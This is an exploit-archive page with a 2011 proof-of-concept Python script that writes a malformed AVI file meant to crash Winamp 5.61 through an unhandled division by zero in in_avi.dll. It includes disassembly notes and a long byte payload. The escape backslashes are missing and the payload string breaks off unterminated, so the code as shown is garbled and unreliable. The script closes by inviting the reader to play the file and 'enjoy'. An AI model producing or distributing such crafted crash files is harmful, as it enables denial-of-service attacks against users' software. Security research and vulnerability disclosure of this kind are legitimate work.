Home / exploits Winamp 5.61 Denial Of Service
Posted on 31 March 2011
# done by BraniX <branix@hackers.org.pl> # www.hackers.org.pl # found: 2011.03.27 # published: 2011.03.29 # tested on: Windows XP SP3 Home Edition # tested on: Windows XP SP3 Professional Edition # App: Winamp 5.61 # App Url: http://www.winamp.com # in_avi.dll MD5: b8cf29733b11cb79fe47cde5127f8b70 # winamp.exe MD5: 7b78fb6a050df1739e69b2df4d93b4ab # Exception in module in_avi_.dll # Memory map, item 772 # Address=07591000 # Size=00008000 (32768.) # Owner=in_avi_1 07590000 # Section=.text # Contains=code # Type=Imag 01001002 # Access=R E # Initial access=RWE # 075988DA 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14] ; ECX = 0 # 075988DE 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10] ; EAX = 0 # 075988E2 33D2 XOR EDX,EDX ; EDX = 0 # 075988E4 F7F1 DIV ECX ; Integer division by zero, exception is not handled filepath = "C:\Winamp 5.61 - AVI DoS.avi" f = open(filepath, "wb") poc = 'x52x49x46x46x60x17x00x00x41x56x49x20x4Cx49x53x54x14x04x00x00x68x64x72x6Cx61x76x69x68x38x00x00x00xA0x86x01x00xC8x04x00x00x00x00x00x00x10x08x00x00x08x00x00x00x00x00x00x00x01x00x00x00x28x01x00x00x10x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x4Cx49x53x54xC8x03x00x00x73x74x72x6Cx73x74x72x68x38x00x00x00x76x69x64x73x6Dx72x6Cx65x00x00x00x00x00x00x00x00x00x00x00x00x0Ax00x00x00xFExFFxFFxFFx00x00x00x00x08x00x00x00x28x01x00x00x10x27x00x00x00x00x00x00x00x00x00x00x10x00x10x00x73x74x72x66x5Cx03x00x00x28x00x00x00x10x00x00x00x10x00x00x00x01x00x08x00x01x00x00x00x00x02x00x00x00x00x00x00x00x00x00x00xCDx00x00x00x00x00x00x00x6Ex62x5Fx00x70x5Bx65x00x6Dx6Bx6Bx00x6Ex6Bx6Cx00x6Ex6Cx6Cx00x70x64x61x00x70x66x64x00x78x69x67x00x7Ax6Fx67x00x7Bx67x6Dx00x70x6Ax6Dx00x70x6Cx6Ex00x79x6Bx69x00x7Bx72x6Bx00x7Bx72x6Cx00x89x7Ax6Fx00x89x7Dx75x00x84x7Dx7Dx00x89x7Fx78x00x8Cx7Cx7Ax00x8Dx7Fx7Dx00xAEx7Bx6Ex00x89x80x7Ax00x89x82x7Dx00x8Dx80x7Cx00x92x81x7Bx00x93x84x79x00x91x82x7Fx00x94x83x7Ex00x93x86x7Ex00x95x87x7Dx00x9Bx84x7Dx00x93x88x7Fx00xB5x82x72x00xBBx88x75x00xE1x8Dx46x00xF7xA6x43x00xC2x8Fx79x00xC8x95x7Cx00xEBxABx7Cx00xD2x3ExB3x00x85x7Bx85x00x87x76x8Dx00x91x7Bx93x00x93x7Cx93x00xA8x45xA9x00xE3x0DxD9x00xFEx00xFEx00xFFx2DxFFx00xCAx5DxCCx00xC3x6AxFFx00xCBx73xFFx00xD4x71xFFx00xDBx77xFFx00x78x90xB5x00x52x84xCEx00x51x85xD0x00x59xB7xFCx00x62xBBxFDx00x64xBAxFCx00x93x89x82x00x95x8Ax82x00x94x8Bx84x00x95x8Cx85x00x95x8Ex89x00x96x91x8Dx00xB8x8Ex8Bx00xA2x90x86x00xA2x91x88x00xA6x96x88x00xA6x9Ax8Dx00xB6x91x8Bx00xA6x9Dx93x00xAFxA3x9Ax00xAFxA4x9Dx00xB0xA2x95x00xB0xA3x98x00xB0xA4x99x00xB0xA8x9Fx00xAFxA6xA1x00xAFxA8xA3x00xAFxA9xA5x00xC6x99x83x00xCFx9Cx80x00xC1x96x93x00xC3x99x95x00xC4x99x95x00xC6x9Cx96x00xC8x9Ex97x00xD5xA2x83x00xD6xA3x84x00xDCxA9x87x00xDExABx88x00xC3xAAx92x00xC6xA8x90x00xCCxA1x99x00xD2xA4x97x00xD3xA6x98x00xD6xA8x9Ax00xD9xADx9Dx00xD9xB1x9Bx00xD6xB8x9Dx00xC8xB7xA9x00xC8xB9xADx00xD3xBExB9x00xEExBDxA5x00xEFxBFxA8x00xF5xB3xAAx00xD6xC3xA7x00xD4xC0xABx00xDDxCFxB5x00xDBxC6xBFx00xEAxCAxA5x00xF0xC1xABx00xF0xC3xAFx00xF9xCFxAEx00xE7xD2xADx00xFAxD0xAEx00xE3xCBxBDx00xF1xC5xB1x00xF2xC8xB6x00xF4xC9xBAx00xF3xCCxBAx00xF3xCDxBDx00xEFxD5xB4x00xEFxD1xBBx00xEExD6xBAx00xF9xD2xB1x00xFAxD4xB4x00xF3xDExB5x00xF4xDFxB6x00xFAxD6xB8x00xFAxD8xBBx00xFAxD9xBDx00xFFxEDxB6x00xF0xE1xBDx00xFFxEAxB9x00xFFxEDxBAx00xFFxF2xBFx00xFFxF4xBCx00x8DxB1xCCx00x92xB7xCFx00x93xA5xD6x00x92xB7xD0x00xBCxC8xD6x00xBDxCExDDx00xDAxC8xC2x00xDBxCBxC7x00xC1xCFxD7x00xC9xD5xDBx00xCExD5xDDx00xD3xD2xD4x00xD2xDBxDEx00xD9xDDxDCx00xE3xCCxC0x00xE4xCDxC0x00xE4xCFxC9x00xE5xCFxCCx00xE5xD1xCCx00xFAxDBxC2x00xFAxDCxC2x00xFBxDExC4x00xFFxD5xCCx00xE6xD3xD0x00xFAxE0xC8x00xFCxE1xCBx00xFBxE2xCDx00xFCxE2xCCx00xFCxE4xCFx00xFFxF8xC6x00xFFxF4xCCx00xFFxFExCAx00xFFxFCxCFx00xF1xE7xD4x00xFCxE4xD0x00xFCxE6xD4x00xFCxE8xD7x00xFCxE8xD8x00xFCxEBxDDx00xFDxECxDDx00xFFxFFxD3x00xFFxFFxDDx00xC9xD8xE1x00xC9xDBxE4x00xD2xDDxE1x00xD2xDFxE6x00xD8xE0xE0x00xD3xE1xE9x00xFDxEExE0x00xFDxF0xE5x00xFBxF4xE7x00xFFxFFxE3x00xFFxF9xE4x00xF8xF2xEAx00xFDxF2xE9x00xFDxF3xECx00xFDxF4xEDx00xFFxFFxE9x00xFExF6xF0x00xFExF8xF1x00xFFxFFxF0x00xFExFAxF5x00xFFxFB f.write(poc) f.close() print "Done, 1 file generated on 'C:\' ..." print "Play this file with Winamp 5.61 and enjoy ;)"
